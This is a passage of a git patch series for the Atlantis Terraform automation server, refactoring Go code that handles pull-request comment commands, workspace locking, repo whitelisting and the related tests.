logging.NewNoopLogger(), CommentParser: &events.CommentParser{}, GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{}, - Parser: &events.EventParser{}, - SupportedVCSHosts: []models.VCSHostType{models.Gitlab}, - RepoWhitelist: &events.RepoWhitelist{}, - VCSClient: vcsClient, + Parser: &events.EventParser{}, + SupportedVCSHosts: []models.VCSHostType{models.Gitlab}, + RepoWhitelistChecker: &events.RepoWhitelistChecker{}, + VCSClient: vcsClient, } requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "gitlabMergeCommentEvent_notWhitelisted.json")) Ok(t, err) @@ -207,7 +207,7 @@ func TestPost_GithubCommentNotWhitelisted(t *testing.T) { CommentParser: &events.CommentParser{}, Parser: &events.EventParser{}, SupportedVCSHosts: []models.VCSHostType{models.Github}, - RepoWhitelist: &events.RepoWhitelist{}, + RepoWhitelistChecker: &events.RepoWhitelistChecker{}, VCSClient: vcsClient, } requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubIssueCommentEvent_notWhitelisted.json")) @@ -325,7 +325,7 @@ func TestPost_GithubPullRequestInvalidRepo(t *testing.T) { func TestPost_GithubPullRequestNotWhitelisted(t *testing.T) { t.Log("when the event is a github pull request to a non-whitelisted repo we return a 400") e, v, _, p, _, _, _, _ := setup(t) - e.RepoWhitelist = &events.RepoWhitelist{Whitelist: "github.com/nevermatch"} + e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"} req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(githubHeader, "pull_request") @@ -424,7 +424,7 @@ func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValid SupportedVCSHosts: []models.VCSHostType{models.Github, models.Gitlab}, GitlabWebHookSecret: secret, GitlabRequestParserValidator: gl, - RepoWhitelist: &events.RepoWhitelist{ + RepoWhitelistChecker: &events.RepoWhitelistChecker{ Whitelist: "*", }, VCSClient: vcsmock, diff --git a/server/router.go b/server/router.go index af9319b987..4f4e2840da 100644 --- a/server/router.go +++ b/server/router.go @@ -9,7 +9,7 @@ import ( // Router can be used to retrieve Atlantis URLs. It acts as an intermediary // between the underlying router and the rest of Atlantis that might need to -// know URLs to different resources. +// construct URLs to different resources. type Router struct { // Underlying is the router that the routes have been constructed on. Underlying *mux.Router diff --git a/server/server.go b/server/server.go index 63bd77a83f..fe97620d53 100644 --- a/server/server.go +++ b/server/server.go @@ -262,7 +262,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { }, }, } - repoWhitelist := &events.RepoWhitelist{ + repoWhitelist := &events.RepoWhitelistChecker{ Whitelist: userConfig.RepoWhitelist, } locksController := &LocksController{ @@ -282,7 +282,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { GithubRequestValidator: &DefaultGithubRequestValidator{}, GitlabRequestParserValidator: &DefaultGitlabRequestParserValidator{}, GitlabWebHookSecret: []byte(userConfig.GitlabWebHookSecret), - RepoWhitelist: repoWhitelist, + RepoWhitelistChecker: repoWhitelist, SupportedVCSHosts: supportedVCSHosts, VCSClient: vcsClient, AtlantisGithubUser: models.User{Username: userConfig.GithubUser}, From d3ec832effdff19a9d83df2c4ab07a20a9f8040c Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 21 Jun 2018 18:18:54 +0100 Subject: [PATCH 40/69] WIP --- server/events/atlantis_workspace.go | 1 + server/events/atlantis_workspace_locker.go | 13 + server/events/command_context.go | 5 +- server/events/command_handler_test.go | 247 ------------------ ...{command_response.go => command_result.go} | 4 +- .../{command_handler.go => command_runner.go} | 155 +++++++---- server/events/command_runner_test.go | 239 +++++++++++++++++ server/events/comment_parser.go | 4 +- server/events/commit_status_updater.go | 12 +- server/events/commit_status_updater_test.go | 66 ++--- server/events/event_parser.go | 121 ++++++--- server/events/event_parser_test.go | 159 +++++++++-- server/events/executor.go | 2 +- server/events/markdown_renderer.go | 6 +- server/events/markdown_renderer_test.go | 175 ++++++++----- ...mmandresponse.go => events_commandname.go} | 10 +- .../mocks/matchers/events_commandresult.go | 20 ++ .../matchers/models_projectcommandcontext.go | 20 ++ .../mocks/matchers/ptr_to_events_command.go | 10 +- .../matchers/ptr_to_events_commentcommand.go | 20 ++ .../ptr_to_github_pullrequestevent.go | 20 ++ .../mocks/matchers/ptr_to_models_repo.go | 20 ++ .../slice_of_models_projectcommandcontext.go | 20 ++ server/events/mocks/mock_command_runner.go | 76 ++++-- .../mocks/mock_commit_status_updater.go | 44 ++-- server/events/mocks/mock_event_parsing.go | 83 +++++- server/events/mocks/mock_executor.go | 8 +- .../mocks/mock_project_command_builder.go | 175 +++++++++++++ .../mocks/mock_pull_request_operator.go | 154 ----------- server/events/models/models_test.go | 7 + ...operator.go => project_command_builder.go} | 148 +++++------ ...est.go => project_command_builder_test.go} | 0 ..._operator.go => project_command_runner.go} | 104 +++++--- ...test.go => project_command_runner_test.go} | 0 server/events/project_result.go | 8 +- ..._step_operator.go => apply_step_runner.go} | 6 +- ...ator_test.go => apply_step_runner_test.go} | 8 +- ...t_step_operator.go => init_step_runner.go} | 4 +- ...rator_test.go => init_step_runner_test.go} | 2 +- ...n_step_operater.go => plan_step_runner.go} | 6 +- ...rater_test.go => plan_step_runner_test.go} | 40 ++- ...l_operator.go => pull_approved_checker.go} | 4 +- .../events/runtime/run_step_operator_test.go | 3 - ...un_step_operator.go => run_step_runner.go} | 6 +- server/events/runtime/run_step_runner_test.go | 50 ++++ server/events/vcs/fixtures/fixtures.go | 8 + server/events/vcs/vcs_test.go | 19 ++ server/events_controller.go | 50 ++-- server/events_controller_e2e_test.go | 78 +++--- server/events_controller_test.go | 159 ++++++++--- server/router_test.go | 27 ++ server/server.go | 69 +++-- server/server_test.go | 1 + .../githubPullRequestClosedEvent.json | 32 +-- .../githubPullRequestOpenedEvent.json | 6 +- .../exp-output-apply-default.txt.act | 7 - .../tfvars-yaml/exp-output-autoplan.txt.act | 61 ----- 57 files changed, 1727 insertions(+), 1075 deletions(-) delete mode 100644 server/events/command_handler_test.go rename server/events/{command_response.go => command_result.go} (89%) rename server/events/{command_handler.go => command_runner.go} (58%) create mode 100644 server/events/command_runner_test.go rename server/events/mocks/matchers/{events_commandresponse.go => events_commandname.go} (53%) create mode 100644 server/events/mocks/matchers/events_commandresult.go create mode 100644 server/events/mocks/matchers/models_projectcommandcontext.go create mode 100644 server/events/mocks/matchers/ptr_to_events_commentcommand.go create mode 100644 server/events/mocks/matchers/ptr_to_github_pullrequestevent.go create mode 100644 server/events/mocks/matchers/ptr_to_models_repo.go create mode 100644 server/events/mocks/matchers/slice_of_models_projectcommandcontext.go create mode 100644 server/events/mocks/mock_project_command_builder.go delete mode 100644 server/events/mocks/mock_pull_request_operator.go rename server/events/{pull_request_operator.go => project_command_builder.go} (62%) rename server/events/{pull_request_operator_test.go => project_command_builder_test.go} (100%) rename server/events/{project_operator.go => project_command_runner.go} (57%) rename server/events/{project_operator_test.go => project_command_runner_test.go} (100%) rename server/events/runtime/{apply_step_operator.go => apply_step_runner.go} (83%) rename server/events/runtime/{apply_step_operator_test.go => apply_step_runner_test.go} (95%) rename server/events/runtime/{init_step_operator.go => init_step_runner.go} (87%) rename server/events/runtime/{init_step_operator_test.go => init_step_runner_test.go} (97%) rename server/events/runtime/{plan_step_operater.go => plan_step_runner.go} (93%) rename server/events/runtime/{plan_step_operater_test.go => plan_step_runner_test.go} (87%) rename server/events/runtime/{approval_operator.go => pull_approved_checker.go} (67%) delete mode 100644 server/events/runtime/run_step_operator_test.go rename server/events/runtime/{run_step_operator.go => run_step_runner.go} (77%) create mode 100644 server/events/runtime/run_step_runner_test.go create mode 100644 server/events/vcs/vcs_test.go create mode 100644 server/router_test.go delete mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act delete mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go index 06944bdae7..251adb7e34 100644 --- a/server/events/atlantis_workspace.go +++ b/server/events/atlantis_workspace.go @@ -35,6 +35,7 @@ type AtlantisWorkspace interface { // absolute path to the root of the cloned repo. Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error) // GetWorkspace returns the path to the workspace for this repo and pull. + // If workspace does not exist on disk, error will be of type os.IsNotExist. GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error) // Delete deletes the workspace for this repo and pull. Delete(r models.Repo, p models.PullRequest) error diff --git a/server/events/atlantis_workspace_locker.go b/server/events/atlantis_workspace_locker.go index 594ea08ab6..cc86db42c7 100644 --- a/server/events/atlantis_workspace_locker.go +++ b/server/events/atlantis_workspace_locker.go @@ -30,6 +30,8 @@ import ( type AtlantisWorkspaceLocker interface { // TryLock tries to acquire a lock for this repo, workspace and pull. TryLock(repoFullName string, workspace string, pullNum int) bool + // TryLock2 tries to acquire a lock for this repo, workspace and pull. + TryLock2(repoFullName string, workspace string, pullNum int) (func(), error) // Unlock deletes the lock for this repo, workspace and pull. If there was no // lock it will do nothing. Unlock(repoFullName, workspace string, pullNum int) @@ -48,6 +50,17 @@ func NewDefaultAtlantisWorkspaceLocker() *DefaultAtlantisWorkspaceLocker { } } +func (d *DefaultAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) (func(), error) { + if !d.TryLock(repoFullName, workspace, pullNum) { + return func() {}, fmt.Errorf("the %s workspace is currently locked by another"+ + " command that is running for this pull request–"+ + "wait until the previous command is complete and try again", workspace) + } + return func() { + d.Unlock(repoFullName, workspace, pullNum) + }, nil +} + // TryLock returns true if a lock is acquired for this repo, pull and workspace and // false otherwise. func (d *DefaultAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) bool { diff --git a/server/events/command_context.go b/server/events/command_context.go index f986e43cc3..49b0f07268 100644 --- a/server/events/command_context.go +++ b/server/events/command_context.go @@ -30,7 +30,6 @@ type CommandContext struct { HeadRepo models.Repo Pull models.PullRequest // User is the user that triggered this command. - User models.User - Command *Command - Log *logging.SimpleLogger + User models.User + Log *logging.SimpleLogger } diff --git a/server/events/command_handler_test.go b/server/events/command_handler_test.go deleted file mode 100644 index 65bcf3c6f5..0000000000 --- a/server/events/command_handler_test.go +++ /dev/null @@ -1,247 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. -// -package events_test - -import ( - "bytes" - "errors" - "log" - "strings" - "testing" - - "github.com/google/go-github/github" - . "github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events" - "github.com/runatlantis/atlantis/server/events/mocks" - "github.com/runatlantis/atlantis/server/events/mocks/matchers" - "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/models/fixtures" - "github.com/runatlantis/atlantis/server/events/vcs" - vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" - logmocks "github.com/runatlantis/atlantis/server/logging/mocks" - . "github.com/runatlantis/atlantis/testing" -) - -var operator *mocks.MockPullRequestOperator -var eventParsing *mocks.MockEventParsing -var vcsClient *vcsmocks.MockClientProxy -var ghStatus *mocks.MockCommitStatusUpdater -var githubGetter *mocks.MockGithubPullGetter -var gitlabGetter *mocks.MockGitlabMergeRequestGetter -var workspaceLocker *mocks.MockAtlantisWorkspaceLocker -var ch events.CommandHandler -var logBytes *bytes.Buffer - -func setup(t *testing.T) { - RegisterMockTestingT(t) - operator = mocks.NewMockPullRequestOperator() - eventParsing = mocks.NewMockEventParsing() - ghStatus = mocks.NewMockCommitStatusUpdater() - workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker() - vcsClient = vcsmocks.NewMockClientProxy() - githubGetter = mocks.NewMockGithubPullGetter() - gitlabGetter = mocks.NewMockGitlabMergeRequestGetter() - logger := logmocks.NewMockSimpleLogging() - logBytes = new(bytes.Buffer) - When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0)) - ch = events.CommandHandler{ - VCSClient: vcsClient, - CommitStatusUpdater: ghStatus, - EventParser: eventParsing, - AtlantisWorkspaceLocker: workspaceLocker, - MarkdownRenderer: &events.MarkdownRenderer{}, - GithubPullGetter: githubGetter, - GitlabMergeRequestGetter: gitlabGetter, - Logger: logger, - AllowForkPRs: false, - AllowForkPRsFlag: "allow-fork-prs-flag", - PullRequestOperator: operator, - } -} - -func TestExecuteCommand_LogPanics(t *testing.T) { - t.Log("if there is a panic it is commented back on the pull request") - setup(t) - ch.AllowForkPRs = true // Lets us get to the panic code. - defer func() { ch.AllowForkPRs = false }() - When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, nil)).ThenPanic("panic") - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 1, nil) - _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments() - Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic") -} - -func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { - t.Log("if CommandHandler was constructed with a nil GithubPullGetter an error should be logged") - setup(t) - ch.GithubPullGetter = nil - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 1, nil) - Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String()) -} - -func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { - t.Log("if CommandHandler was constructed with a nil GitlabMergeRequestGetter an error should be logged") - setup(t) - ch.GitlabMergeRequestGetter = nil - ch.ExecuteCommand(fixtures.GitlabRepo, fixtures.GitlabRepo, fixtures.User, 1, nil) - Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String()) -} - -func TestExecuteCommand_GithubPullErr(t *testing.T) { - t.Log("if getting the github pull request fails an error should be logged") - setup(t) - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) - Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String()) -} - -func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { - t.Log("if getting the gitlab merge request fails an error should be logged") - setup(t) - When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) - ch.ExecuteCommand(fixtures.GitlabRepo, fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil) - Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String()) -} - -func TestExecuteCommand_GithubPullParseErr(t *testing.T) { - t.Log("if parsing the returned github pull request fails an error should be logged") - setup(t) - var pull github.PullRequest - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err")) - - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) - Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) -} - -func TestExecuteCommand_ForkPRDisabled(t *testing.T) { - t.Log("if a command is run on a forked pull request and this is disabled atlantis should" + - " comment saying that this is not allowed") - setup(t) - ch.AllowForkPRs = false // by default it's false so don't need to reset - var pull github.PullRequest - modelPull := models.PullRequest{State: models.Open} - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) - - headRepo := fixtures.GithubRepo - headRepo.FullName = "forkrepo/atlantis" - headRepo.Owner = "forkrepo" - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil) - - ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, nil) - vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag) -} - -func TestExecuteCommand_ClosedPull(t *testing.T) { - t.Log("if a command is run on a closed pull request atlantis should" + - " comment saying that this is not allowed") - setup(t) - pull := &github.PullRequest{ - State: github.String("closed"), - } - modelPull := models.PullRequest{State: models.Closed} - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil) - - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) - vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") -} - -func TestExecuteCommand_WorkspaceLocked(t *testing.T) { - t.Log("if the workspace is locked, should comment back on the pull") - setup(t) - pull := &github.PullRequest{ - State: github.String("closed"), - } - cmd := events.Command{ - Name: events.Plan, - Workspace: "workspace", - } - - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false) - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) - - msg := "The workspace workspace is currently locked by another" + - " command that is running for this pull request." + - " Wait until the previous command is complete and try again." - ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) - _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments() - Equals(t, msg, response.Failure) - vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num, - "**Plan Failed**: "+msg+"\n\n") -} - -func TestExecuteCommand_FullRun(t *testing.T) { - t.Log("when running a plan, apply should comment") - pull := &github.PullRequest{ - State: github.String("closed"), - } - cmdResponse := events.CommandResponse{} - for _, c := range []events.CommandName{events.Plan, events.Apply} { - setup(t) - cmd := events.Command{ - Name: c, - Workspace: "workspace", - } - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) - switch c { - case events.Plan: - When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) - case events.Apply: - When(operator.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) - } - - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) - - ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) - _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments() - Equals(t, cmdResponse, response) - vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) - workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) - } -} - -func TestExecuteCommand_ForkPREnabled(t *testing.T) { - t.Log("when running a plan on a fork PR, it should succeed") - setup(t) - - // Enable forked PRs. - ch.AllowForkPRs = true - defer func() { ch.AllowForkPRs = false }() // Reset after test. - - var pull github.PullRequest - cmdResponse := events.CommandResponse{} - cmd := events.Command{ - Name: events.Plan, - Workspace: "workspace", - } - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) - headRepo := fixtures.GithubRepo - headRepo.FullName = "forkrepo/atlantis" - headRepo.Owner = "forkrepo" - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) - When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) - - ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) - - ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) - _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments() - Equals(t, cmdResponse, response) - vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) - workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) -} diff --git a/server/events/command_response.go b/server/events/command_result.go similarity index 89% rename from server/events/command_response.go rename to server/events/command_result.go index abba3897b4..ff767ddb58 100644 --- a/server/events/command_response.go +++ b/server/events/command_result.go @@ -13,8 +13,8 @@ // package events -// CommandResponse is the result of running a Command. -type CommandResponse struct { +// CommandResult is the result of running a Command. +type CommandResult struct { Error error Failure string ProjectResults []ProjectResult diff --git a/server/events/command_handler.go b/server/events/command_runner.go similarity index 58% rename from server/events/command_handler.go rename to server/events/command_runner.go index bfd25dd935..c54891e87e 100644 --- a/server/events/command_handler.go +++ b/server/events/command_runner.go @@ -29,10 +29,11 @@ import ( // CommandRunner is the first step after a command request has been parsed. type CommandRunner interface { - // ExecuteCommand is the first step after a command request has been parsed. + // RunCommentCommand is the first step after a command request has been parsed. // It handles gathering additional information needed to execute the command // and then calling the appropriate services to finish executing the command. - ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *Command) + RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *CommentCommand) + RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) } //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_github_pull_getter.go GithubPullGetter @@ -51,14 +52,13 @@ type GitlabMergeRequestGetter interface { GetMergeRequest(repoFullName string, pullNum int) (*gitlab.MergeRequest, error) } -// CommandHandler is the first step when processing a comment command. -type CommandHandler struct { +// DefaultCommandRunner is the first step when processing a comment command. +type DefaultCommandRunner struct { VCSClient vcs.ClientProxy GithubPullGetter GithubPullGetter GitlabMergeRequestGetter GitlabMergeRequestGetter CommitStatusUpdater CommitStatusUpdater EventParser EventParsing - AtlantisWorkspaceLocker AtlantisWorkspaceLocker MarkdownRenderer *MarkdownRenderer Logger logging.SimpleLogging // AllowForkPRs controls whether we operate on pull requests from forks. @@ -66,17 +66,50 @@ type CommandHandler struct { // AllowForkPRsFlag is the name of the flag that controls fork PR's. We use // this in our error message back to the user on a forked PR so they know // how to enable this functionality. - AllowForkPRsFlag string - PullRequestOperator PullRequestOperator + AllowForkPRsFlag string + ProjectCommandBuilder ProjectCommandBuilder + ProjectCommandRunner *ProjectCommandRunner } -// ExecuteCommand executes the command. -// If the repo is from GitHub, we don't use headRepo and instead make an API call -// to get the headRepo. This is because the caller is unable to pass in a -// headRepo since there's not enough data available on the initial webhook -// payload. -func (c *CommandHandler) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *Command) { +func (c *DefaultCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) { + log := c.buildLogger(baseRepo.FullName, pull.Num) + ctx := &CommandContext{ + User: user, + Log: log, + Pull: pull, + HeadRepo: headRepo, + BaseRepo: baseRepo, + } + runFn := func() ([]ProjectResult, error) { + projectCmds, err := c.ProjectCommandBuilder.BuildAutoplanCommands(ctx) + if err != nil { + return nil, err + } + var results []ProjectResult + for _, cmd := range projectCmds { + res := c.ProjectCommandRunner.Plan(cmd) + results = append(results, ProjectResult{ + ProjectCommandResult: res, + Path: cmd.RepoRelPath, + Workspace: cmd.Workspace, + }) + } + return results, nil + } + c.run(ctx, AutoplanCommand{}, runFn) +} + +// RunCommentCommand executes the command. +// We take in a pointer for maybeHeadRepo because for some events there isn't +// enough data to construct the Repo model and callers might want to wait until +// the event is further validated before making an additional (potentially +// wasteful) call to get the necessary data. +func (c *DefaultCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *CommentCommand) { log := c.buildLogger(baseRepo.FullName, pullNum) + var headRepo models.Repo + if maybeHeadRepo != nil { + headRepo = *maybeHeadRepo + } var err error var pull models.PullRequest @@ -97,13 +130,38 @@ func (c *CommandHandler) ExecuteCommand(baseRepo models.Repo, headRepo models.Re Log: log, Pull: pull, HeadRepo: headRepo, - Command: cmd, BaseRepo: baseRepo, } - c.run(ctx) + + runFn := func() ([]ProjectResult, error) { + var result ProjectCommandResult + switch cmd.Name { + case Plan: + projectCmd, err := c.ProjectCommandBuilder.BuildPlanCommand(ctx, cmd) + if err != nil { + return nil, err + } + result = c.ProjectCommandRunner.Plan(projectCmd) + case Apply: + projectCmd, err := c.ProjectCommandBuilder.BuildApplyCommand(ctx, cmd) + if err != nil { + return nil, err + } + result = c.ProjectCommandRunner.Apply(projectCmd) + default: + ctx.Log.Err("failed to determine desired command, neither plan nor apply") + } + return []ProjectResult{{ + Path: cmd.Dir, + Workspace: cmd.Workspace, + ProjectCommandResult: result, + }}, nil + } + + c.run(ctx, cmd, runFn) } -func (c *CommandHandler) getGithubData(baseRepo models.Repo, pullNum int) (models.PullRequest, models.Repo, error) { +func (c *DefaultCommandRunner) getGithubData(baseRepo models.Repo, pullNum int) (models.PullRequest, models.Repo, error) { if c.GithubPullGetter == nil { return models.PullRequest{}, models.Repo{}, errors.New("Atlantis not configured to support GitHub") } @@ -111,14 +169,14 @@ func (c *CommandHandler) getGithubData(baseRepo models.Repo, pullNum int) (model if err != nil { return models.PullRequest{}, models.Repo{}, errors.Wrap(err, "making pull request API call to GitHub") } - pull, repo, err := c.EventParser.ParseGithubPull(ghPull) + pull, _, headRepo, err := c.EventParser.ParseGithubPull(ghPull) if err != nil { - return pull, repo, errors.Wrap(err, "extracting required fields from comment data") + return pull, headRepo, errors.Wrap(err, "extracting required fields from comment data") } - return pull, repo, nil + return pull, headRepo, nil } -func (c *CommandHandler) getGitlabData(baseRepo models.Repo, pullNum int) (models.PullRequest, error) { +func (c *DefaultCommandRunner) getGitlabData(baseRepo models.Repo, pullNum int) (models.PullRequest, error) { if c.GitlabMergeRequestGetter == nil { return models.PullRequest{}, errors.New("Atlantis not configured to support GitLab") } @@ -130,60 +188,47 @@ func (c *CommandHandler) getGitlabData(baseRepo models.Repo, pullNum int) (model return pull, nil } -func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging.SimpleLogger { +func (c *DefaultCommandRunner) buildLogger(repoFullName string, pullNum int) *logging.SimpleLogger { src := fmt.Sprintf("%s#%d", repoFullName, pullNum) return logging.NewSimpleLogger(src, c.Logger.Underlying(), true, c.Logger.GetLevel()) } -func (c *CommandHandler) run(ctx *CommandContext) { - defer c.logPanics(ctx) - +func (c *DefaultCommandRunner) validateCtxAndComment(ctx *CommandContext) bool { if !c.AllowForkPRs && ctx.HeadRepo.Owner != ctx.BaseRepo.Owner { ctx.Log.Info("command was run on a fork pull request which is disallowed") c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, fmt.Sprintf("Atlantis commands can't be run on fork pull requests. To enable, set --%s", c.AllowForkPRsFlag)) // nolint: errcheck - return + return false } if ctx.Pull.State != models.Open { ctx.Log.Info("command was run on closed pull request") c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, "Atlantis commands can't be run on closed pull requests") // nolint: errcheck + return false + } + return true +} + +func (c *DefaultCommandRunner) run(ctx *CommandContext, command CommandInterface, commandRunner func() ([]ProjectResult, error)) { + defer c.logPanics(ctx) + + if !c.validateCtxAndComment(ctx) { return } ctx.Log.Debug("updating commit status to pending") - if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, ctx.Command); err != nil { + if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, command.CommandName()); err != nil { ctx.Log.Warn("unable to update commit status: %s", err) } - if !c.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num) { - errMsg := fmt.Sprintf( - "The %s workspace is currently locked by another"+ - " command that is running for this pull request."+ - " Wait until the previous command is complete and try again.", - ctx.Command.Workspace) - ctx.Log.Warn(errMsg) - c.updatePull(ctx, CommandResponse{Failure: errMsg}) - return - } - ctx.Log.Debug("successfully acquired workspace lock") - defer 